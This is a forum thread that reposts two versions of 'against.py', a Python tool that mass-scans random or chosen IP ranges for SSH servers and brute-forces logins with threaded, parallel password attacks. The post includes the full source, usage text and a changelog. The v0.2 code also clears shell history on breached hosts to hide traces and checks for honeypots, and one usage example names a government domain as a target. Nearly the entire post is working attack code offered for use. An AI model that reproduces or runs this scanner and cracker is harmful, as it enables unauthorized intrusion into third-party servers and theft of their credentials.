Active Members Fi8sVrs Posted June 26, 2013 Active Members Report Share Posted June 26, 2013 (edited) about:#!/usr/bin/env python# -*- coding: latin-1 -*- ####################################################### ____ _ __ ## ___ __ __/ / /__ ___ ______ ______(_) /___ __ ## / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / ## /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, / ## /___/ team ## ## against.py - mass scanning and brute-forcing script for ssh ## ## FILE ## against.py ## ## DATE ## 2013-06-25 ## ## DESCRIPTION ## 'against.py' is a very fast ssh attacking script which includes a ## multithreaded port scanning module (tcp connect) for discovering possible ## targets and a multithreaded brute-forcing module which attacks ## parallel (multiprocessing) all discovered hosts or given ip-adresses ## from a list. ## ## AUTHOR ## pigtail23 aka pgt ## #################################################################################against.py:#!/usr/bin/env pythonfrom socket import *import multiprocessingimport threadingimport timeimport paramikoimport sysimport osimport loggingimport argparseimport random# print our nice banner def banner(): print '--==[ against.py by pigtail23@nullsecurity.net ]==--'# print versiondef version(): print '[+] against.py v0.1' exit(0)# checks if we can write to file which was given by parameter -odef test_file(filename): try: outfile = open(filename, 'a') outfile.close() except: print '[-] ERROR: Cannot write to file \'%s\'' % filename exit(1)# defines the command line parameter and help pagedef argspage(): parser = argparse.ArgumentParser( usage='\n\n ./%(prog)s -i <arg> | -r <arg> | -I <arg>', formatter_class=argparse.RawDescriptionHelpFormatter, epilog= 'examples:\n\n' \ ' scanning and attacking random ips\n' \ ' usage: ./%(prog)s -r 50 -L password.txt\n\n' \ ' scanning and attacking an ip-range\n' \ ' usage: ./%(prog)s -i 192.168.0.1-254 -u admin -l troll\n\n' \ ' attack ips from file\n' \ ' usage: ./%(prog)s -I ips.txt -L passwords.txt\n', add_help=False ) options = parser.add_argument_group('options', '') options.add_argument('-i', default=False, metavar='<ip/range>', help='ip-address/-range (e.g.: 192.168.0-3.1-254)') options.add_argument('-I', default=False, metavar='<file>', help='list of target ip-addresses') options.add_argument('-r', default=False, metavar='<num>', help='attack random hosts') options.add_argument('-p', default=22, metavar='<num>', help='port number of sshd (default: 22)') options.add_argument('-t', default=4, metavar='<num>', help='threads per host (default: 4)') options.add_argument('-f', default=8, metavar='<num>', help='attack max hosts parallel (default: 8)') options.add_argument('-u', default='root', metavar='<username>', help='single username (default: root)') options.add_argument('-U', default=False, metavar='<file>', help='list of usernames') options.add_argument('-l', default='toor', metavar='<password>', help='single password (default: toor)') options.add_argument('-L', default=False, metavar='<file>', help='list of passwords') options.add_argument('-o', default=False, metavar='<file>', help='write found logins to file') options.add_argument('-T', default=3, metavar='<sec>', help='timeout in seconds (default: 3)') options.add_argument('-V', action='store_true', help='print version of against.py and exit') args = parser.parse_args() if args.V: version() if (args.i == False) and (args.I == False) and (args.r == False): print '' parser.print_help() exit(0) return args# connect to target and checks for an open portdef scan(target, port, timeout): s = socket(AF_INET, SOCK_STREAM) s.settimeout(timeout) result = s.connect_ex((target, port)) s.close() if result == 0: HOSTLIST.append(target)# creates 'x' numbers of threads and call scan()def thread_scan(args, target): port = int(args.p) to = float(args.T) bam = threading.Thread(target=scan, args=(target, port, to,)) bam.start() # scanning with up to 200 threads for targets with open port while threading.activeCount() > 200: time.sleep(0.0001) time.sleep(0.0001)# only the output when scanning for targetsdef scan_output(i): sys.stdout.flush() sys.stdout.write('\r[*] hosts scanned: {0} | ' \ 'possible to attack: {1}'.format(i, len(HOSTLIST)))# creates single ips by a given ip-range - parameter -idef ip_range(args): targets = args.i a = tuple(part for part in targets.split('.')) rsa = (range(4)) rsb = (range(4)) for i in range(0,4): ga = a.find('-') if ga != -1: rsa = int(a[:ga]) rsb = int(a[1+ga:]) + 1 else: rsa = int(a) rsb = int(a) + 1 print '[*] scanning %s for ssh services' % targets m = 0 for i in range (rsa[0], rsb[0]): for j in range (rsa[1], rsb[1]): for k in range (rsa[2], rsb[2]): for l in range(rsa[3], rsb[3]): target = '%d.%d.%d.%d' % (i, j, k, l) m += 1 scan_output(m) thread_scan(args, target) # waiting for the last running threads while threading.activeCount() > 1: time.sleep(0.1) scan_output(m) print '\n[*] finished scan.'# only refactor stuffdef rand(): return random.randrange(0,256)# creates random ipsdef rand_ip(args): i = 0 print '[*] scanning random ips for ssh services' while len(HOSTLIST) < int(args.r): target = '%d.%d.%d.%d' % (rand(), rand(), rand(), rand()) i += 1 scan_output(i) thread_scan(args, target) # waiting for the last running threads while threading.activeCount() > 1: time.sleep(0.1) scan_output(i) print '\n[*] finished scan.'# checks if given filename by parameter existsdef file_exists(filename): try: open(filename).readlines() except IOError: print '[-] ERROR: cannot open file \'%s\'' % filename exit(1)# read-in a file with ipsdef ip_list(ipfile): file_exists(ipfile) hosts = open(ipfile).readlines() for host in hosts: HOSTLIST.append(host)# write all found logins to file - parameter -odef write_logins(filename, login): outfile = open(filename, 'a') outfile.write(login) outfile.close()# connect to target and try to logindef crack(target, prt, user, passw, outfile, to, i): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) user = user.replace('\n', '') passw = passw.replace('\n', '') try: ssh.connect(target, port=prt, username=user, password=passw, timeout=to) #ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command('uname -a') #print ssh_stdout login = '[+] login found for %s | %s:%s' % (target, user, passw) print login if outfile: write_logins(outfile, login + '\n') ssh.close() os._exit(0) except paramiko.AuthenticationException: ssh.close() except: ssh.close() # after 8 timeouts per request the attack against $target will stopped if i < 8: i += 1 # reconnect after random seconds (between 0.2 and 0.5 sec) ra = random.uniform(0.2, 0.6) time.sleep(ra) crack(target, prt, user, passw, outfile, to, i) else: print '[-] too much timeouts - stopped attack against %s' % (target) os._exit(1)# creates 'x' number of threads and call crack()def thread_it(target, args): port = int(args.p) user = args.u userlist = args.U password = args.l passlist = args.L outfile = args.o to = float(args.T) threads = int(args.t) if userlist: user = open(userlist).readlines() else: user = [ user ] if passlist: password = open(passlist).readlines() else: password = [ password ] # looks dirty but we need it :/ try: for us in user: for pw in password: Run = threading.Thread(target=crack, args=(target, port, us, pw, outfile, to, 0,)) Run.start() # checks that we a max number of threads while threading.activeCount() > threads: time.sleep(0.01) time.sleep(0.001) # waiting for the last running threads while threading.activeCount() > 1: time.sleep(0.1) except KeyboardInterrupt: os._exit(1)# create 'x' child processes (child == cracking routine for only one target)def fork_it(args): threads = int(args.t) childs = int(args.f) len_hosts = len(HOSTLIST) print '[*] attacking %d target(s)\n' \ '[*] cracking up to %d hosts parallel\n' \ '[*] threads per host: %d' % (len_hosts, childs, threads) i = 1 for host in HOSTLIST: host = host.replace('\n', '') print '[*] performing attacks against %s [%d/%d]' % (host, i, len_hosts) hostfork = multiprocessing.Process(target=thread_it, args=(host, args)) hostfork.start() # checks that we have a max number of childs while len(multiprocessing.active_children()) >= childs: time.sleep(0.001) time.sleep(0.001) i += 1 # waiting for the last running childs while multiprocessing.active_children(): time.sleep(1)def empty_hostlist(): if len(HOSTLIST) == 0: print '[-] found no targets to attack!' exit(1)# output when against.py finished all routinesdef finished(): print '[*] game over!!! have fun with your new b0xes!'def main(): banner() args = argspage() if args.U: file_exists(args.U) if args.L: file_exists(args.L) if args.o: test_file(args.o) if args.i: ip_range(args) elif args.I: ip_list(args.I) else: rand_ip(args) time.sleep(0.1) empty_hostlist() fork_it(args) finished()if __name__ == '__main__': HOSTLIST = [] try: logging.disable(logging.CRITICAL) main() except KeyboardInterrupt: print '\nbye bye!!!' time.sleep(0.2) os._exit(1)Modules need:paramiko:sudo apt-get install python-paramikoargparse:sudo apt-get install python-argparseusage:chmod u+x against.py--==[ against.py by pigtail23@nullsecurity.net ]==-- ./against.py -i <arg> | -r <arg> | -I <arg>options: -i <ip/range> ip-address/-range (e.g.: 192.168.0-3.1-254) -I <file> list of target ip-addresses -r <num> attack random hosts -p <num> port number of sshd (default: 22) -t <num> threads per host (default: 4) -f <num> attack max hosts parallel (default: 8) -u <username> single username (default: root) -U <file> list of usernames -l <password> single password (default: toor) -L <file> list of passwords -o <file> write found logins to file -T <sec> timeout in seconds (default: 3) -V print version of against.py and exitexamples: scanning and attacking random ips usage: ./against.py -r 50 -L password.txt scanning and attacking an ip-range usage: ./against.py -i 192.168.0.1-254 -u admin -l troll attack ips from file usage: ./against.py -I ips.txt -L passwords.txtSource: nullsecurity Edited July 11, 2013 by Fi8sVrs Quote Link to comment Share on other sites More sharing options...
Active Members Fi8sVrs Posted March 9, 2014 Author Active Members Report Share Posted March 9, 2014 UPDATE v0.2# CHANGELOG # v0.2 # - prints kernel version after login # - optimized timings when cracking # - detection for key authentication # - false positive / small honeypot detection # - save found target ip addresses to file, -O option # - 127.x.x.x will be excluded when scanning for random ip addresses # - unsort found target ip addresses, because of sequential port scanning # - resolve ip address by given hostname # - stop attacks on target when keyboard-interactive is required # - set threads for port scanning, -s option usage: ./against.py -i <arg> | -r <arg> | -I <arg>options: -i <ip/range> ip address/ip range/domain (e.g.: 192.168.0-3.1-254) -I <file> list of targets -r <num> attack random hosts -p <num> port number of sshd (default: 22) -t <num> threads per host (default: 4) -f <num> attack max hosts parallel (default: 8) -u <username> single username (default: root) -U <file> list of usernames -l <password> single password (default: toor) -L <file> list of passwords -o <file> write found logins to file -O <file> write found target ip addresses to file -s <num> threads when port scanning (default: 200) -T <sec> timeout in seconds (default: 3) -V print version of against.py and exitexamples: attack single target usage: ./against.py -i nsa.gov -L passwords.txt scanning and attacking an ip-range usage: ./against.py -i 192.168.0-10.1-254 -u admin -l troll -s 500#!/usr/bin/env python# -*- coding: latin-1 -*- from socket import *import multiprocessingimport threadingimport timeimport paramikoimport sysimport osimport loggingimport argparseimport randomimport re# version of against.pyVERSION = 'v0.2'# print our nice banner def banner(): print '--==[ against.py by pgt@nullsecurity.net ]==--'# print versiondef version(): print '[+] against.py %s' % (VERSION) sys.exit(0)# check if we can write to filedef test_file(filename): try: outfile = open(filename, 'a') outfile.close() except IOError: print '[!] ERROR: cannot write to file \'%s\'' % filename sys.exit(1)# define command line parameters and help pagedef argspage(): parser = argparse.ArgumentParser( usage = '\n\n ./%(prog)s -i <arg> | -r <arg> | -I <arg>', formatter_class = argparse.RawDescriptionHelpFormatter, epilog = 'examples:\n\n' ' attack single target\n' ' usage: ./%(prog)s -i nsa.gov -L passwords.txt\n\n' ' scanning and attacking an ip-range\n' ' usage: ./%(prog)s -i 192.168.0-10.1-254 -u admin -l troll -s 500', add_help = False ) options = parser.add_argument_group('options', '') options.add_argument('-i', default=False, metavar='<ip/range>', help='ip address/ip range/domain (e.g.: 192.168.0-3.1-254)') options.add_argument('-I', default=False, metavar='<file>', help='list of targets') options.add_argument('-r', default=False, metavar='<num>', help='attack random hosts') options.add_argument('-p', default=22, metavar='<num>', help='port number of sshd (default: 22)') options.add_argument('-t', default=4, metavar='<num>', help='threads per host (default: 4)') options.add_argument('-f', default=8, metavar='<num>', help='attack max hosts parallel (default: 8)') options.add_argument('-u', default='root', metavar='<username>', help='single username (default: root)') options.add_argument('-U', default=False, metavar='<file>', help='list of usernames') options.add_argument('-l', default='toor', metavar='<password>', help='single password (default: toor)') options.add_argument('-L', default=False, metavar='<file>', help='list of passwords') options.add_argument('-o', default=False, metavar='<file>', help='write found logins to file') options.add_argument('-O', default=False, metavar='<file>', help='write found target ip addresses to file') options.add_argument('-s', default=200, metavar='<num>', help='threads when port scanning (default: 200)') options.add_argument('-T', default=3, metavar='<sec>', help='timeout in seconds (default: 3)') options.add_argument('-V', action='store_true', help='print version of against.py and exit') args = parser.parse_args() if args.V: version() if (args.i == False) and (args.I == False) and (args.r == False): print '' parser.print_help() sys.exit(0) return args# write found ip addresses / logins to filedef write_to_file(filename, text): outfile = open(filename, 'a') outfile.write(text) outfile.close()# connect to target and checks for an open portdef scan(target, port, timeout, oips): sock = socket(AF_INET, SOCK_STREAM) sock.settimeout(timeout) result = sock.connect_ex((target, port)) sock.close() if result == 0: HOSTLIST.append(target) if oips: write_to_file(oips, target + '\n')# control the maximum number of threadsdef active_threads(threads, waittime): while threading.activeCount() > threads: time.sleep(waittime)# create thread and call scan()def thread_scan(args, target): port = int(args.p) timeout = float(args.T) oips = args.O threads = int(args.s) bam = threading.Thread(target=scan, args=(target, port, timeout, oips)) bam.start() active_threads(threads, 0.0001) time.sleep(0.001)# only the output when scanning for targetsdef scan_output(i): sys.stdout.flush() sys.stdout.write('\r[*] hosts scanned: {0} | ' \ 'possible to attack: {1}'.format(i, len(HOSTLIST)))# handle format of given target(s)def check_targets(targets): if re.match(r'^[0-9.\-]*$', targets): return targets try: target = gethostbyname(targets) return target except gaierror: print '[-] \'%s\' is unreachable' % (targets) finished() sys.exit(1)# unsort found hosts, because of incremental scanningdef unsort_hostlist(): print '[*] unsort host list' for i in range(15): random.shuffle(HOSTLIST)# handle ip range format from command linedef handle_ip_range(iprange): parted = tuple(part for part in iprange.split('.')) rsa = range(4) rsb = range(4) for i in range(4): hyphen = parted.find('-') if hyphen != -1: rsa = int(parted[:hyphen]) rsb = int(parted[1+hyphen:]) + 1 else: rsa = int(parted) rsb = int(parted) + 1 return (rsa, rsb)# call thread_scan() with target ip addressesdef ip_range(args): targets = check_targets(args.i) rsa, rsb = handle_ip_range(targets) print '[*] scanning %s for ssh services' % targets counter = 0 for i in range(rsa[0], rsb[0]): for j in range(rsa[1], rsb[1]): for k in range(rsa[2], rsb[2]): for l in range(rsa[3], rsb[3]): target = '%d.%d.%d.%d' % (i, j, k, l) counter += 1 scan_output(counter) thread_scan(args, target) # waiting for the last running threads active_threads(1, 0.1) scan_output(counter) print '\n[*] finished scan'# create ip addressesdef randip(): rand = range(4) for i in range(4): rand = random.randrange(0, 256) # exclude 127.x.x.x if rand[0] == 127: randip() ipadd = '%d.%d.%d.%d' % (rand[0], rand[1], rand[2], rand[3]) return ipadd# create random ip addressesdef rand_ip(args): i = 0 print '[*] scanning random ips for ssh services' while len(HOSTLIST) < int(args.r): i += 1 scan_output(i) thread_scan(args, randip()) # waiting for the last running threads active_threads(1, 1) scan_output(i) print '\n[*] finished scan.'# checks if given filename by parameter existsdef file_exists(filename): try: open(filename).readlines() except IOError: print '[!] ERROR: cannot open file \'%s\'' % filename sys.exit(1)# read-in a file with ip addressesdef ip_list(ipfile): file_exists(ipfile) targets = open(ipfile).readlines() for target in targets: HOSTLIST.append(target)# connect to target and try to logindef crack(target, port, user, passwd, outfile, timeo, i): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) user = user.replace('\n', '') passwd = passwd.replace('\n', '') try: ssh.connect(target, port=port, username=user, password=passwd, timeout=timeo, pkey=None, allow_agent=False) time.sleep(3) try: ssh.exec_command('unset HISTFILE ; unset HISTSIZE') time.sleep(1) ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command('uname -a ' \ '|| cat /proc/version') output = 'kernel: %s' \ % (ssh_stdout.readlines()[0].replace('\n', '')) except: output = 'info: maybe a honeypot or false positive' login = '[+] login found for %s | %s:%s\n' \ '[!] %s' % (target, user, passwd, output) print login if outfile: write_to_file(outfile, login + '\n') ssh.close() os._exit(0) except paramiko.AuthenticationException, e: ssh.close() exception = str(e) if '[\'publickey\']' in exception: print '[-] key authentication only - ' \ 'stopped attack against %s' % (target) os._exit(1) elif '\'keyboard-interactive\'' in exception: print '[-] %s requires \'keyboard-interactive\' handler' % (target) os._exit(1) except: ssh.close() # after 3 timeouts per request the attack against $target will stopped if i < 3: i += 1 # reconnect after random seconds (between 0.6 and 1.2 sec) randtime = random.uniform(0.6, 1.2) time.sleep(randtime) crack(target, port, user, passwd, outfile, timeo, i) else: print '[-] too many timeouts - stopped attack against %s' % (target) os._exit(1)# create 'x' number of threads and call crack()def thread_it(target, args): port = int(args.p) user = args.u userlist = args.U password = args.l passlist = args.L outfile = args.o timeout = float(args.T) threads = int(args.t) if userlist: users = open(userlist).readlines() else: users = [user] if passlist: passwords = open(passlist).readlines() else: passwords = [password] # try/except looks dirty but we need it :/ try: for user in users: for password in passwords: Run = threading.Thread(target=crack, args=(target, port, user, password, outfile, timeout, 0,)) Run.start() # checks that we a max number of threads active_threads(threads, 0.01) time.sleep(0.1) # waiting for the last running threads active_threads(1, 1) except KeyboardInterrupt: os._exit(1)# create 'x' child processes (child == cracking routine for only one target)def fork_it(args): threads = int(args.t) childs = int(args.f) len_hosts = len(HOSTLIST) print '[*] attacking %d target(s)\n' \ '[*] cracking up to %d hosts parallel\n' \ '[*] threads per host: %d' % (len_hosts, childs, threads) i = 1 for host in HOSTLIST: host = host.replace('\n', '') print '[*] performing attacks against %s [%d/%d]' % (host, i, len_hosts) hostfork = multiprocessing.Process(target=thread_it, args=(host, args)) hostfork.start() # checks that we have a max number of childs while len(multiprocessing.active_children()) >= childs: time.sleep(0.001) time.sleep(0.001) i += 1 # waiting for child processes while multiprocessing.active_children(): time.sleep(1)# \(0.o)/def empty_hostlist(): if len(HOSTLIST) == 0: print '[-] found no targets to attack!' finished() sys.exit(1)# output when against.py finished all routinesdef finished(): print '[*] game over!!!'def main(): banner() args = argspage() if args.U: file_exists(args.U) if args.L: file_exists(args.L) if args.o: test_file(args.o) if args.O: test_file(args.O) if args.i: ip_range(args) unsort_hostlist() elif args.I: ip_list(args.I) else: rand_ip(args) time.sleep(0.1) empty_hostlist() fork_it(args) finished()if __name__ == '__main__': HOSTLIST = [] try: logging.disable(logging.CRITICAL) main() except KeyboardInterrupt: print '\nbye bye!!!' time.sleep(0.2) os._exit(1)http://www.nullsecurity.net/tools/cracker/against.py 1 Quote Link to comment Share on other sites More sharing options...